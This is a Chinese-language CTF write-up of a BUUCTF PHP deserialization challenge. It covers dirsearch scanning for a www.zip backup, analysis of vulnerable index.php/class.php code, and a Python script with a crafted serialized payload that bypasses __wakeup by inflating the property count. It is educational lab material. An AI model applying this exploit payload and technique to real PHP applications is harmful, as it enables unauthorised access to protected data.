题目链接:buuoj
扫描敏感文件
根据题目描述,应该网站是存在备份文件的,这里用dirsearch工具扫描一下可以发现备份文件是www.zip。(PS:BUUCTF对大量的请求会返回429错误码,建议调小一下扫描的线程数)。
python3 dirsearch.py -u http://03670227-0f65-49ec-ad73-1075e1f979fc.node3.buuoj.cn/ -e php -t 1 | grep -E "200"
分析源码
下载j解压后有多个文件,其中有一个flag.php文件,提交后不是正确的答案。重点看index.php和class.php这两个文件。index.php中关键的代码如下:
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
首先包含了class.php文件,然后获得GET方式传递的参数,对数据进行了反序列化。
在看一下class.php文件
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
发现能得到flag的位置在变量销毁是调用destruct()函数。只有当Name类的对象的password属性值为100并且username属性值为admin时,才会输出flag。而在反序列化是会调用wakeup函数使得username属性值为guest。这里就需要绕过wakeup函数。绕过的方法是:改变构造好的序列化字符串属性的个数,使得和Name中属性个数不一致,这样就会绕过wakeup函数。同时要注意private类型的变量和protected类型的变量序列化后的特点:
\x00 + 类名 + \x00 + 变量名 -> 反序列化为private变量
\x00 + * + \x00 + 变量名 -> 反序列化为protected变量
pyload如下:
import requests
payload='O:4:"Name":3:{s:14:"\x00Name\x00username";s:5:"admin";s:14:"\x00Name\x00password";i:100;}'
url='http://03670227-0f65-49ec-ad73-1075e1f979fc.node3.buuoj.cn/?select='
r = requests.get(url+payload)
print(r.text)
总结
本题主要考查PHP反序列化漏洞,这里就是利用了构造属性个数与类的本身属性个数不同来实现绕过wakeup()函数。同时要注意private类型的变量序列化后的字符串的特征